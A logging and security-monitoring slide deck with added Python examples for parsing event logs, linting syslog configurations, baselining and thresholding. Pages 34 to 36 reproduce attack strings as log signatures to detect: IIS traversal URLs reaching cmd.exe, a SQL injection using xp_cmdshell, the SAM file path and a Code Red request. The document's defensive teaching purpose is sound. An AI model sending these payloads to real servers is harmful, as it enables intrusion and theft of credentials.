Logging: Make Your Life Easier

Dr. Tina Bird, tbird@precision-guesswork.com

Last modified: 27-Aug-15.

Page 1: Logging: Make Your Life Easier

Page 2: Goals

• Using system & application logs to improve security and reliability on your network

• Building a logging infrastructure that works

• Rapid detection of events that are usually bad news

Page 3: Agenda

• Figuring out where to start

• Centralizing your log data

• Parsing system logs

• Attack signatures

• Common mistakes

Page 4: Just starting out?

• What do you need to know? Start small. Pick one or two apps or types of devices.

• What kinds of events indicate security problems, performance issues or administrative changes?

• Are your favorite events recorded by the default logging configuration on your device?

Page 5: Always watch for…

• Hardware failures

• Resource exhaustion

• Reboots/restarts

• Patches or changes to system code or firmware or app software (upgrades or downgrades)

• Failed logins, esp to admin accounts

Page 6: UNIX Login Attempts

Sep 12 10:17:11 kuspy PAM_pwdb[17529]: authentication failure; (uid=0) -> tbird for ssh service

Sep 12 10:17:12 kuspy sshd[17529]: log: Password authentication for tbird accepted.

Page 7: Failed Logon to Win2k Domain

<132>EvntSLog:6388: [AUF] Wed Oct 10 10:57:15 2001: OSMOSIS/Security (675) - "Pre-authentication failed: User Name: Administrator User ID: %{S-1-5-21-776561741-2052111302-1417001333-500} Service Name: krbtgt/LAB Pre-Authentication Type: 0x2 Failure Code: 0x18 Client Address: 127.0.0.1 "

<132>EvntSLog:6389: [AUF] Wed Oct 10 10:57:15 2001: OSMOSIS/Security (529) - "Logon Failure: Reason: Unknown user name or bad password User Name: Administrator Domain: LAB Logon Type: 2 Logon Process: User32 Authentication Package: Negotiate Workstation Name: OSMOSIS"

Page 8: UNIX System Boot

Jul 8 01:46:52 evileye unix: SunOS Release 5.7 Version Generic_106541-04 [UNIX(R) System V Release 4.0]

Page 9: Windows System Reboot

Page 10: Windows System Reboot cont.

Page 11: Cisco IOS restart

*Mar 1 00:00:24.716 UTC: %SYS-5-RESTART: System restarted –

Cisco Internetwork Operating System Software IOS (tm) C3500XL Software (C3500XL-C3H2S-M), Version 12.0(5.4)WC(1), MAINTENANCE INTERIM SOFTWARE

Copyright (c) 1986-2001 by cisco Systems, Inc.

Compiled Tue 10-Jul-01 12:32 by devgoyal

Page 12: Always watch for:

• Creation of new accounts, esp those that “look like” system accounts, or have admin privileges

Page 13: Creating New User – WinNT

<133>EvntSLog:423: [AUS] Fri Oct 05 11:59:09 2001: HANDCUFFS/Security (624) - "User Account Created: New Account Name: tbird New Domain: HANDCUFFS New Account ID: S-1-5-21-1647595427-22557637-1039276024-1001 Caller User Name: Administrator Caller Domain: HANDCUFFS Caller Logon ID: (0x0,0x2B79) Privileges - "

Page 14: Creating New User – WinNT cont.

<133>EvntSLog:424: [AUS] Fri Oct 05 11:59:09 2001: HANDCUFFS/Security (626) - "User Account Enabled: Target Account Name: tbird Target Domain: HANDCUFFS Target Account ID: S-1-5-21-1647595427-22557637-1039276024-1001 Caller User Name: Administrator Caller Domain: HANDCUFFS Caller Logon ID: (0x0,0x2B79) "

<133>EvntSLog:425: [AUS] Fri Oct 05 11:59:09 2001: HANDCUFFS/Security (628) - "User Account password set: Target Account Name: tbird Target Domain: HANDCUFFS Target Account ID: S-1-5-21-1647595427-22557637-1039276024-1001 Caller User Name: Administrator Caller Domain: HANDCUFFS Caller Logon ID: (0x0,0x2B79) "
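The three HANDCUFFS lines above are one account-creation sequence (624 created, 626 enabled, 628 password set), and the OSMOSIS lines on page 7 are logon failures against Administrator. The Python below is an added example, not from the slides: it parses the EvntSLog format into event ID and named fields, ties the sequence together per account, counts failures against Administrator, and flags new accounts whose names resemble system accounts (the warning on page 12). The last sample line (sequence 430, SID S-1-5-21-0-0-0-1002) is constructed, and the looks_like_system_account heuristic is an assumption of this example, not something Windows provides.

```python
import re

# One EvntSLog line: <pri>EvntSLog:seq: [flag] timestamp: HOST/Log (event_id) - "message"
EVENT_RE = re.compile(
    r'^<(?P<pri>\d+)>EvntSLog:(?P<seq>\d+): \[(?P<flag>[A-Z]+)\] '
    r'(?P<when>[^:]+:\d\d:\d\d \d{4}): (?P<host>[^/]+)/(?P<log>\w+) '
    r'\((?P<event_id>\d+)\) - "(?P<message>.*)"\s*$'
)

# Event IDs quoted on the slides: account lifecycle and logon failures.
ACCOUNT_LIFECYCLE = {624: "created", 626: "enabled", 628: "password set"}
LOGON_FAILURES = {529: "logon failure", 675: "pre-authentication failed"}

# Sample input: the HANDCUFFS and OSMOSIS lines from the deck, plus one constructed
# line (seq 430, placeholder SID) creating an account named to pass for a system account.
SAMPLE_LINES = [
    '<133>EvntSLog:423: [AUS] Fri Oct 05 11:59:09 2001: HANDCUFFS/Security (624) - "User Account Created: New Account Name: tbird New Domain: HANDCUFFS New Account ID: S-1-5-21-1647595427-22557637-1039276024-1001 Caller User Name: Administrator Caller Domain: HANDCUFFS Caller Logon ID: (0x0,0x2B79) Privileges - "',
    '<133>EvntSLog:424: [AUS] Fri Oct 05 11:59:09 2001: HANDCUFFS/Security (626) - "User Account Enabled: Target Account Name: tbird Target Domain: HANDCUFFS Target Account ID: S-1-5-21-1647595427-22557637-1039276024-1001 Caller User Name: Administrator Caller Domain: HANDCUFFS Caller Logon ID: (0x0,0x2B79) "',
    '<133>EvntSLog:425: [AUS] Fri Oct 05 11:59:09 2001: HANDCUFFS/Security (628) - "User Account password set: Target Account Name: tbird Target Domain: HANDCUFFS Target Account ID: S-1-5-21-1647595427-22557637-1039276024-1001 Caller User Name: Administrator Caller Domain: HANDCUFFS Caller Logon ID: (0x0,0x2B79) "',
    '<132>EvntSLog:6388: [AUF] Wed Oct 10 10:57:15 2001: OSMOSIS/Security (675) - "Pre-authentication failed: User Name: Administrator User ID: %{S-1-5-21-776561741-2052111302-1417001333-500} Service Name: krbtgt/LAB Pre-Authentication Type: 0x2 Failure Code: 0x18 Client Address: 127.0.0.1 "',
    '<132>EvntSLog:6389: [AUF] Wed Oct 10 10:57:15 2001: OSMOSIS/Security (529) - "Logon Failure: Reason: Unknown user name or bad password User Name: Administrator Domain: LAB Logon Type: 2 Logon Process: User32 Authentication Package: Negotiate Workstation Name: OSMOSIS"',
    '<133>EvntSLog:430: [AUS] Fri Oct 05 12:03:41 2001: HANDCUFFS/Security (624) - "User Account Created: New Account Name: SYSTEM$ New Domain: HANDCUFFS New Account ID: S-1-5-21-0-0-0-1002 Caller User Name: tbird Caller Domain: HANDCUFFS Caller Logon ID: (0x0,0x2C10) Privileges - "',
]


def parse_event(line):
    """Split one EvntSLog line into its header parts and the quoted message."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["event_id"] = int(ev["event_id"])
    return ev


def field(message, key):
    """Value following 'Key Name:' inside the message text (values are space-delimited)."""
    m = re.search(re.escape(key) + r': (\S+)', message)
    return m.group(1) if m else None


def account_lifecycle(lines):
    """Group 624/626/628 events by target account: who created what, and which steps were logged."""
    out = {}
    for line in lines:
        ev = parse_event(line)
        if not ev or ev["event_id"] not in ACCOUNT_LIFECYCLE:
            continue
        key = "New Account Name" if ev["event_id"] == 624 else "Target Account Name"
        acct = field(ev["message"], key)
        entry = out.setdefault(acct, {"caller": field(ev["message"], "Caller User Name"), "steps": []})
        entry["steps"].append(ACCOUNT_LIFECYCLE[ev["event_id"]])
    return out


def looks_like_system_account(name):
    # Heuristic (an assumption of this example): names ending in '$' or containing
    # SYSTEM/SERVICE read as machine or service accounts at a glance.
    n = name.upper()
    return n.endswith("$") or "SYSTEM" in n or "SERVICE" in n


def suspicious_new_accounts(lines):
    """New accounts (event 624) whose names imitate system accounts."""
    names = []
    for line in lines:
        ev = parse_event(line)
        if ev and ev["event_id"] == 624:
            name = field(ev["message"], "New Account Name")
            if name and looks_like_system_account(name):
                names.append(name)
    return names


def admin_logon_failures(lines):
    """Count 529/675 events whose target user is Administrator."""
    return sum(
        1 for line in lines
        if (ev := parse_event(line)) and ev["event_id"] in LOGON_FAILURES
        and field(ev["message"], "User Name") == "Administrator"
    )
```

Because event 624 names the caller, the output answers the question the slide raises: not just that an account appeared, but who made it and whether the enable and password-set steps followed in the same second.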

Page 15: Monitoring Routers

• User entering enable mode

• Access control list changes

• Enable/disable/reconfigure interfaces

• Firmware downgraded/upgraded/patched

• Conditions that produce Traceback errors

• rsh, rcp connection attempts

Page 16: Config Change on Cisco IOS

%SYS-5-CONFIG: Configured from host1-config by rcp from 172.16.101.101

Page 17: root or Admin access

Sep 12 12:21:58 kuspy PAM_pwdb[17904]: (su) session opened for user root by tbird(uid=501)

Page 18: Monitoring Firewalls

• Host OS messages as applicable

• Configuration changes

• Adds/deletes/changes of admin accounts

• Administrative traffic from “unexpected” locations (like the Internet)

• Connection logs (start/stop/amt of data)

Page 19: FireWall-1 to loghost

• Need to record operating system events, firewall policy configuration changes, network connection logs for thorough monitoring

• Assumes UNIX host for FW-1

• Operating system events: standard syslog configuration for the host OS

Page 20: FireWall-1 to loghost cont.

• Firewall policy changes:

– command line loads are recorded by syslog

– loads, changes created via GUI tool are recorded in $FWDIR/log/cpmgmt.aud

– as root, start /bin/sh and type

/bin/tail -f $FWDIR/log/cpmgmt.aud | /bin/logger -p local6.info > /dev/null 2>&1 &

Page 21: FireWall-1 to loghost cont.

Page 22: FireWall-1 to loghost cont.

• Firewall network connection logs:

– connection logs are stored in Checkpoint proprietary binary format

– as root, start /bin/sh and type

$FWDIR/bin/fw log -tf | /bin/logger -p local5.info

• Watch the log size!

Page 23: ACL changes

Sep 12 12:13:39 2000 f_cf a_acladm t_acl_change p_major pid: 21734 ruid: 0 euid: 0 pgid: 21734 fid: 1021694 cmd: 'cf' domain: Admn edomain: Admn acl_admin: tbird acl_op: modify acl_table: acl acl_data: {'ignore': 0, 'name': 'ssh_ext_soc'}

Page 24: Firewall Rulesets & Logs

• Most firewalls log connection requests and results using a rule’s number (position in ruleset) or name

• Usually don’t log set of rules to system log

• Have to manually correlate against ruleset, or record ruleset in system logs

Page 25: Monitoring Database Servers

• Interactive DB access rather than scheduled jobs or automated processing

• Access control changes (DBA granting themselves or other DBAs higher level of access to system)

• DB account access over network

• Automated reporting of network component versions

Page 26: Monitoring Database Servers cont.

• Changes to scripts on DB servers

• Presence (?) and use of non-interactive DB accounts

Page 27: File system full

set /kernel: pid 801 (mysqld), uid 88 on /var: file system full

Page 28: Monitoring Web Servers

• Host OS messages

• Malicious signatures in access logs (artificial ignorance/content inspection)

• New virtual hosts added

• New listening ports or virtual IPs added

• Unusual increase in inbound or outbound traffic (Nimda, anyone?)

Page 29: Monitoring Web Servers cont.

• New scripts

• New modules

• New content

• Parent or child processes dying with unexpected errors

• Web server action resulting from client request (i.e. how did that URL map to file system?)

Page 30: MS IIS to loghost

• Variety of attacks target IIS; Web servers usually the first target of malicious activity

• Web logs difficult to integrate into central monitoring system: performance issues, no native utility that writes IIS logs to Event Log

Page 31: IIS workflow

• Decode incoming client connection request

• Determine proper virtual web server

• Determine proper document root

• Call handler for data requested by client

Page 32: How does IIS write logfiles?

• Data written block by block (64kb) rather than line by line – unused space is filled with zeros rather than left uninitialized

• Merely monitoring IIS logs for changes in file sizes can be misleading!

• Log files get smaller when IIS is stopped because zeros are deleted – not because an attacker is deleting data!
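To make the size caveat concrete, here is an added example (not from the slides) that models the 64 KB block write with zero fill and classifies a size change by comparing the real content instead of the byte count. The log content, the pad_to_block model and the three verdict labels are constructed for illustration.

```python
BLOCK = 64 * 1024  # IIS writes log data in 64 KB blocks, per the slide

# Constructed W3C-style log content; the records are made up for the example.
CONTENT = (b"#Fields: date time c-ip cs-method cs-uri-stem sc-status\n"
           b"2001-09-18 09:35:12 204.120.69.195 GET /scripts/..%255c../winnt/system32/cmd.exe 404\n"
           b"2001-09-18 09:40:01 198.51.100.4 GET /index.html 200\n")


def pad_to_block(data: bytes, block: int = BLOCK) -> bytes:
    """Model of the file while IIS holds it open: content, then zero fill to the block boundary."""
    remainder = len(data) % block
    return data if remainder == 0 else data + b"\x00" * (block - remainder)


# What a size-only monitor sees while the service is running.
OPEN_FILE = pad_to_block(CONTENT)


def logical_size(data: bytes) -> int:
    """Size of the real log content, ignoring trailing zero padding.
    (Text logs never end in NUL bytes, so stripping them is safe here.)"""
    return len(data.rstrip(b"\x00"))


def raw_vs_logical(data: bytes) -> tuple:
    """(bytes on disk, bytes of actual records) - the two numbers the slide says diverge."""
    return len(data), logical_size(data)


def classify_change(before: bytes, after: bytes) -> str:
    """Explain a change between two snapshots of the same IIS log file.

    'padding'   only the zero fill changed (e.g. IIS stopped and trimmed the file): benign
    'appended'  earlier content intact, new records added: normal operation
    'truncated' earlier content missing or altered: investigate (possible tampering)
    """
    b, a = before.rstrip(b"\x00"), after.rstrip(b"\x00")
    if a == b:
        return "padding"
    if a.startswith(b):
        return "appended"
    return "truncated"
```

A monitor built on logical_size and classify_change stays quiet when the file shrinks from 65536 bytes to a few hundred on service stop, and still raises the case that matters: earlier records disappearing.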

Page 33: Requirements for Web Logs

• Must be forwarded to central log server in close to real-time, with or without local processing

• Forwarding mechanism must not degrade performance of Web server significantly

• Note that syslog specifies packet max size of 1024 bytes – watch URL length

Page 34: Attacks on IIS

• Remote access to Windows Shell:

http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:\

• Download the Windows password DB:

[drive-letter]:\winnt\repair\sam._

Page 35: Attacks on IIS cont.

• Inappropriate access to server info:

http://host/index.asp?something=..\..\..\..\WINNT\system32\cmd.exe?/c+DIR+e:\WINNT\*.txt

• SQL injection attack on MS-SQL:

http://host/cgi-bin/lame.asp?name=john`;EXEC master.dbo.xp_cmdshell'cmd.exe dir c:'--

Page 36: Code Red

128.101.47.28 - - [28/Sep/2001:00:43:43 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 284 "-" "-"

Page 37: Centralizing Your Logs

• Why?

– easier to archive

– easier to correlate

– log preservation if host is attacked

• Homogeneous or mixed?

• Homogeneous: lucky you

– Built in mechanisms

• Mixed

Page 38: Centralizing Your Logs cont.

• Mixed environment

• syslog may not be a good choice

– security

– reliability

• syslog may be the only choice

– most supported logging mechanism

• So it’s clearly the best choice!

Page 39: syslogd

• Consolidated audit mechanism for UNIX kernel and application messages

• Gives application and OS developers a consistent interface for reporting significant events

• Allows local or remote storage of messages

Page 40: syslogd cont.

• /etc/syslog.conf controls how much data is generated, and where it is stored

• syslog.conf format: selector <Tab> action

• selectors indicate what’s sending the message, and what criticality the message has

Page 41: syslogd cont.

• facility – the application or system component that generates a log message

• user – default facility applied if nothing else is specified when message is written

• mark – inserts a timestamp into log data at regular intervals (useful for validating time synchronization, system performance)

Page 42: syslogd cont.

• level – the severity of a message on the computer generating it, i.e.

• emerg – system is or will be unusable if situation is not resolved (most severe)

• alert – immediate action required

• notice – a significant but typically normal event that may merit investigation

• Assigned by the developer who implemented the logging

Page 43: syslogd cont.

• action – what’s done with a message once it’s received from a facility

• actions usually represent destinations – message is written to a local file, a syslog daemon on another system, the system console, or a user console

Page 44: syslogd Historical Oddities

• Many syslogds require <Tab> as delimiter, not whitespace, & die gory, unpleasant, hard-to-detect deaths if <Tab>s are not present

• Fixed in SDSC-syslog, syslog-ng, sysklogd, some OS implementations (FreeBSD)
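An added example, not from the slides, that reads a syslog.conf, flags the two things pages 40 to 44 warn about (spaces instead of <Tab>, an unknown facility or level) and answers "where does a facility.level message go?" using the classic selector semantics: a level means that level and anything more severe, `*` means any, and `none` switches a facility off even if an earlier selector on the same rule matched it. The configuration, the loghost name and the facility list are constructed; facility names differ slightly between syslogd implementations.

```python
import re

# Classic syslog severities, 0 = most severe.  panic/error/warn are legacy spellings.
SEVERITY = {"emerg": 0, "panic": 0, "alert": 1, "crit": 2, "err": 3, "error": 3,
            "warning": 4, "warn": 4, "notice": 5, "info": 6, "debug": 7}
# Facility names common to most syslogd implementations (assumption: extend per platform).
FACILITIES = {"auth", "authpriv", "cron", "daemon", "ftp", "kern", "lpr", "mail", "mark",
              "news", "syslog", "user", "uucp"} | {f"local{i}" for i in range(8)}

# Constructed syslog.conf.  Line 3 separates selector and action with spaces, the
# historical failure the slide describes; line 7 names a facility that does not exist.
SAMPLE_CONF = """\
# constructed example config
*.info;mail.none;authpriv.none\t/var/log/messages
authpriv.*   /var/log/secure
mail.*\t-/var/log/maillog
*.emerg\t*
kern.crit;local6.info\t@loghost.example.com
local9.info\t/var/log/bogus
"""


def parse_rule(line):
    """Split one rule into ([(facility, level), ...], action, [problems])."""
    problems = []
    if "\t" in line:
        selector_text, action = line.split("\t", 1)
    else:
        # Tolerate plain whitespace the way sysklogd/syslog-ng do, but flag it:
        # a classic syslogd would reject (or silently mishandle) this rule.
        parts = line.split(None, 1)
        if len(parts) != 2:
            return None, None, ["no action field"]
        selector_text, action = parts
        problems.append("selector/action separated by spaces, not <Tab>")
    selectors = []
    for sel in selector_text.split(";"):
        if "." not in sel:
            problems.append(f"selector {sel!r} lacks '.level'")
            continue
        fac_list, level = sel.rsplit(".", 1)
        if level not in SEVERITY and level not in ("*", "none"):
            problems.append(f"unknown level {level!r}")
        for fac in fac_list.split(","):
            if fac != "*" and fac not in FACILITIES:
                problems.append(f"unknown facility {fac!r}")
            selectors.append((fac, level))
    return selectors, action.strip(), problems


def rules(conf):
    """Yield (line_no, line) for every non-blank, non-comment line."""
    for n, raw in enumerate(conf.splitlines(), 1):
        line = raw.rstrip()
        if line and not line.startswith("#"):
            yield n, line


def lint(conf):
    """[(line_no, problem), ...] for the whole config."""
    return [(n, p) for n, line in rules(conf) for p in parse_rule(line)[2]]


def actions_for(conf, facility, level):
    """Actions that receive a message logged at facility.level."""
    result = []
    for _n, line in rules(conf):
        selectors, action, _ = parse_rule(line)
        if selectors is None:
            continue
        matched = False
        for fac, lvl in selectors:          # later selectors override earlier ones
            if fac != "*" and fac != facility:
                continue
            if lvl == "none":
                matched = False
            elif lvl == "*" or (lvl in SEVERITY and SEVERITY[level] <= SEVERITY[lvl]):
                matched = True
        if matched:
            result.append(action)
    return result
```

Running lint over a production syslog.conf before deploying it is the cheap way to avoid the "gory, unpleasant, hard-to-detect" death the slide describes; actions_for is the same check from the other direction, confirming that the messages you care about actually have a destination.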

Page 45: Audit Caveats

• syslog only records what you’ve told it to record

• Vast majority of events on a system are not recorded – events must generate logs to show up in log monitoring

• Failed attacks often leave tracks; successful attacks are often only recorded indirectly

Page 46: Audit Caveats cont.

• Running automated attack tools (nessus, CyberCop Scanner) against base operating systems – 15% of all probes logged by OS or application mechanisms, but at least record genuine system activity

• IDS, other network alarms really help to identify when further examination is warranted

Page 47: syslogd Issues

• No default limitations on data sources (users or processes), so all log data is inherently unreliable

• Nothing to prevent forged data from being inserted into data stream

• Limited number of actions possible on receipt of a particular message

Page 48: syslogd Replacements

• Improved ability to filter and redirect inbound log messages

• Integrity checks on locally-stored logfiles

• Store more information about log data and events

• Fix that whole <Tab> problem

• Retain compatibility with classic syslog

Page 49: syslogd Replacements cont.

• syslog-ng: most popular replacement; allows forwarding over TCP; remembers forwarding addresses; more granular message filtering

• modular syslog: a syslog replacement that includes data integrity checks, easy database integration, and output redirection using regular expressions

Page 50: Real-World Secure Transmission

• SDSC-syslog implements syslog-sign and syslog-reliable

• nsyslog – TCP over SSL

• Tunnelling over SSH or SSL

Client: netcat -l -u -p syslog | netcat localhost 9999

loghost: netcat -l -p 9999 | netcat localhost -u syslog

• Serial cables

Page 51: Windows Event Log

• Windows analog of syslog

• No integrated capability for remote logging

• Binary file – no grep!

• System default – auditing is disabled

Page 52: Windows Event Log cont.

• System Log: Startup and shutdown messages, system component data, critical services

• Security Log: Windows auditing system data only, including user & host auth, share access, printing, other

• Application Log: Nearly everything else

Page 53: Windows Event Log cont.

• Any process can write to Application and System Event Logs – “should” register message library

• Only LSA and Event Log Service itself can write to Security Event Log

• Security log is more reliable forensic information than off the shelf syslog

Page 54: Windows Application Log

• Application Log messages parsed via message dictionary

• Should be provided by application developer

• Frequently isn’t

Page 55: Windows Application Log cont.

Page 56: Windows Event Log cont.

Page 57: Windows Event Log cont.

Page 58: Windows Event Log cont.

Page 59: Windows to loghost

• Third-party tools required to send Event Log data to remote loghost

• Pure syslog clients:

– http://www.eventreporter.com

– BackLog: http://www.intersectalliance.com/projects

– http://www.sabernet.net/software/ntsyslog.html

Page 60: Windows to loghost cont.

• Other options: Perl module Win32::EventLog – allows external access to EventLog API

• Discussion based on inexpensive third-party tool, EventReporter

Page 61: Windows Audit Policy

Page 62: Windows to loghost cont.

Page 63: Windows to loghost cont.

Page 64: Windows to loghost cont.

Page 65: Windows to loghost cont.

Page 66: What to do with all that data

• Automate rapid sorting of data into “must respond now” and “ought to process later” categories

• Or, what to do with all the stuff you get when you configure your devices to tell you what you need to know

Page 67: A Note on Log Reduction

• Most tools use regular expressions (of varying complexity) to divide logs into “discard” and “investigate”

• Size of logs also reduced by fixing problems: minor configuration errors & hardware glitches that don’t disrupt service but can be resolved

Page 68: Log Analysis Tools

• Some syslog collectors (like syslog-ng) offer sophisticated parsing mechanisms for real-time processing as data is received

• Some analysis tools with the ability to handle real-time data streams can be used as collectors

but….

Page 69: Log Analysis Tools cont.

• In practice want to separate the collecting and analyzing capacities even if you use the same code

– archive raw data for future processing

– both tasks can be extremely resource intensive, so separating them provides better scalability

Page 70: Artificial Ignorance

• Eliminate log data that indicates normal, allowed behavior, and focus your energy on the residue

• checksyslog automates removal of “nominal status” messages once you know what they are

Page 71: Artificial Ignorance cont.

• Regular expressions describing nominal behavior:

in.telnetd\[\d+\]: connect from (friendly\.org|pc2\.foo\.edu)

postfix/smtpd\[\d+\]: reject: RCPT from.*.Sender address rejected: Domain not found

Page 72: Build a Quick & Dirty Ignore List

cut -f5- -d\ all.log.0 | sort | uniq -c |sort -nr > uniq.sorted.freq
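The same pipeline in Python, as an added example that is not from the slides: strip timestamp and host, count message shapes for the baseline (pages 70 and 76), and drop anything matching the nominal-behaviour patterns from page 71. The sample lines are constructed. Two deliberate differences from `cut -f5- -d' '` are noted in the code: syslog pads single-digit days with a second space ("Jul  8"), which shifts cut's field numbering, so a regex strips the prefix instead; and pids are masked so repeats of the same message count together.

```python
import re
from collections import Counter

# Constructed syslog lines; host, pids and the telnet/SMTP peers are made up.
SAMPLE_LOG = """\
Sep 12 10:15:01 kuspy in.telnetd[2201]: connect from friendly.org
Sep 12 10:15:07 kuspy in.telnetd[2202]: connect from pc2.foo.edu
Sep 12 10:16:00 kuspy postfix/smtpd[2210]: reject: RCPT from unknown[10.0.0.9]: 450 Sender address rejected: Domain not found
Sep 12 10:17:11 kuspy PAM_pwdb[17529]: authentication failure; (uid=0) -> tbird for ssh service
Sep 12 10:17:12 kuspy sshd[17529]: log: Password authentication for tbird accepted.
Sep 12 10:20:00 kuspy -- MARK --
Sep 12 10:22:41 kuspy in.telnetd[2215]: connect from 203.0.113.7
Sep 12 10:40:00 kuspy -- MARK --
"""

# Timestamp + host prefix.  A regex is safer than cut -f5- -d' ' because single-digit
# days carry a second space ("Jul  8"), which shifts cut's field numbering by one.
PREFIX_RE = re.compile(r'^[A-Z][a-z]{2} {1,2}\d{1,2} \d\d:\d\d:\d\d \S+ ')
PID_RE = re.compile(r'\[\d+\]')

# The "nominal status" patterns from the slide, plus syslog's own mark messages.
IGNORE_PATTERNS = [
    re.compile(r'in\.telnetd\[\d+\]: connect from (friendly\.org|pc2\.foo\.edu)'),
    re.compile(r'postfix/smtpd\[\d+\]: reject: RCPT from.*.Sender address rejected: Domain not found'),
    re.compile(r'^-- MARK --$'),
]


def message_body(line):
    """What cut -f5- is meant to return: the line minus timestamp and host."""
    return PREFIX_RE.sub('', line, count=1)


def template(line):
    """Body with the pid masked so repeats of the same message shape count together."""
    return PID_RE.sub('[N]', message_body(line))


def frequency_table(lines):
    """The sort | uniq -c | sort -nr step: message shape -> count (Counter keeps most_common())."""
    return Counter(template(l) for l in lines if l.strip())


def ignore_list_candidates(lines, min_count=2):
    """Quick & dirty: the most frequent shapes are the first to review for the ignore list."""
    return [(shape, n) for shape, n in frequency_table(lines).most_common() if n >= min_count]


def residue(lines, patterns=IGNORE_PATTERNS):
    """Artificial ignorance: drop lines matching any known-benign pattern, keep the rest."""
    kept = []
    for line in lines:
        if not line.strip():
            continue
        body = message_body(line)
        if not any(p.search(body) for p in patterns):
            kept.append(line)
    return kept
```

On the sample the residue is three lines: the failed then accepted ssh authentication for tbird, and a telnet connection from a host the ignore list has never seen. That is the point of the technique: nothing in the residue was "detected", it simply was not explained away.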

Page 73: logsurfer

• Multi-line log event processor

• Maintains context messages & situations

• Includes timeouts and resource limits

• Can change monitoring behavior if situation requires

Page 74: logsurfer cont.

Configuration issues:

• Severe system impact possible if external programs (like sendmail) are called in response to events

• Regular expressions must be “good enough”

– too general matches irrelevant messages

– too specific misses messages that should be matched

Page 75: logsurfer cont.

# rpcbind #--------------------------------------

' rpcbind: refused connect from ([^ ]*)' ' connect from ([^ ]*.local.net|localhost)' - - 0 CONTINUE open "^.{19,}$2" - 4000 86400 0 ignore

' ([^ .]*)(.local.net|) rpcbind: refused connect from ([^ ]*) ' - - - 0 CONTINUE rule before " rpcbind: refused connect from $4" - - - 300 ignore

' ([^ .]*)(.local.net|) rpcbind: refused connect from ([^ ]*) ' - - - 0 exec "/usr/local/sbin/safe_finger @4 | /usr/local/sbin/start-mail logsurfer \"$2: rpcbind: (backtrack)\""

Page 76: Baselining

What’s normal?

• How many apps/facilities/systems report to loghost?

• How many distinct messages from each facility?

• Top ten most frequent and “top” ten least frequent are a good place to start

Page 77: Baselining cont.

• Amount of network traffic per protocol: total HTTP, email, FTP etc.

• Logins/logoffs, access of admin accounts

• DHCP address management, DNS requests

• total amount of log data per hour/day

• number of processes running at any time

Page 78: Thresholding

• Once you’ve baselined, what’s weird?

• Conditions: given a line of data,

– notify based on the presence of a second line

– the absence of a second line

– number of times that event happens in a given time period

• Or notify when a message doesn’t appear!
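An added example, not from the slides, implementing the three conditions above over constructed syslog lines in the PAM_pwdb / sshd format from page 6: N matching events inside a time window, a failure followed by an accepted login for the same user, and a mark heartbeat that stops arriving. The thresholds, the 20-minute mark interval and the year supplied to the parser (syslog timestamps carry none) are assumptions of this example.

```python
import re
from datetime import datetime, timedelta

MONTHS = {m: i for i, m in enumerate(
    ["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"], 1)}
LINE_RE = re.compile(r'^([A-Z][a-z]{2}) {1,2}(\d{1,2}) (\d\d):(\d\d):(\d\d) (\S+) (.*)$')

# Patterns modelled on the PAM_pwdb / sshd lines shown earlier in the deck.
AUTH_FAIL = re.compile(r'PAM_pwdb\[\d+\]: authentication failure; \(uid=\d+\) -> (\S+) for \S+ service')
AUTH_OK = re.compile(r'sshd\[\d+\]: log: Password authentication for (\S+) accepted')
ROOT_FAIL = re.compile(r'authentication failure; .* -> root for')
MARK = re.compile(r'^-- MARK --$')

# Assumed thresholds for the demonstration.
ONE_MINUTE = timedelta(seconds=60)
HALF_MINUTE = timedelta(seconds=30)
MARK_INTERVAL = timedelta(minutes=20)   # assumed syslogd mark interval

# Constructed sample log (host, pids and timings are made up).
SAMPLE_LOG = """\
Sep 12 10:00:00 kuspy -- MARK --
Sep 12 10:17:05 kuspy PAM_pwdb[17520]: authentication failure; (uid=0) -> root for ssh service
Sep 12 10:17:08 kuspy PAM_pwdb[17521]: authentication failure; (uid=0) -> root for ssh service
Sep 12 10:17:11 kuspy PAM_pwdb[17529]: authentication failure; (uid=0) -> tbird for ssh service
Sep 12 10:17:12 kuspy sshd[17529]: log: Password authentication for tbird accepted.
Sep 12 10:17:20 kuspy PAM_pwdb[17530]: authentication failure; (uid=0) -> root for ssh service
Sep 12 10:20:00 kuspy -- MARK --
Sep 12 11:05:00 kuspy -- MARK --
"""


def parse(line, year=2001):
    """(timestamp, host, message) for one syslog line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    mon, day, hh, mm, ss, host, msg = m.groups()
    return datetime(year, MONTHS[mon], int(day), int(hh), int(mm), int(ss)), host, msg


def events(text, year=2001):
    return [e for e in (parse(l, year) for l in text.splitlines()) if e]


def count_threshold(evs, pattern, window, limit):
    """'N times in a given period': timestamps at which the number of matching
    messages inside the trailing window reaches `limit`."""
    alerts, recent = [], []
    for ts, _host, msg in evs:
        if not pattern.search(msg):
            continue
        recent = [t for t in recent if ts - t <= window] + [ts]
        if len(recent) == limit:
            alerts.append(ts)
    return alerts


def failure_then_success(evs, within):
    """'Presence of a second line': a failed authentication followed by an accepted
    password for the same user within `within`."""
    last_fail, hits = {}, []
    for ts, _host, msg in evs:
        f = AUTH_FAIL.search(msg)
        if f:
            last_fail[f.group(1)] = ts
            continue
        s = AUTH_OK.search(msg)
        if s and s.group(1) in last_fail and ts - last_fail[s.group(1)] <= within:
            hits.append((s.group(1), ts))
    return hits


def missing_heartbeat(evs, pattern, expected, slack=timedelta(seconds=30)):
    """'Notify when a message doesn't appear': gaps between consecutive matching
    messages longer than the expected interval plus a little slack."""
    gaps, prev = [], None
    for ts, _host, msg in evs:
        if not pattern.search(msg):
            continue
        if prev is not None and ts - prev > expected + slack:
            gaps.append((prev, ts))
        prev = ts
    return gaps
```

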